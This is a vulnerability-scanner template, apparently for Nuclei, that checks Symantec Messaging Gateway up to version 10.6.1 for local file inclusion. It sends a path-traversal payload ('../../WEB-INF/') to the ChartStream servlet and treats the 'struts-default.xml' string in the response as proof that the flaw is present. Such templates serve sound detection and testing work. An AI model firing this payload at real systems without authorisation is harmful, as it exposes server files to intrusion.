id: symantec-messaging-gateway

info:
  name: Symantec Messaging Gateway <=10.6.1 - Local File Inclusion
  author: Random_Robbie
  severity: high
  description: Symantec Messaging Gateway 10.6.1 and prior are vulnerable to local file inclusion.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: lfi,messaging,symantec

requests:
  - method: GET
    path:
      - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "struts-default.xml"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/04
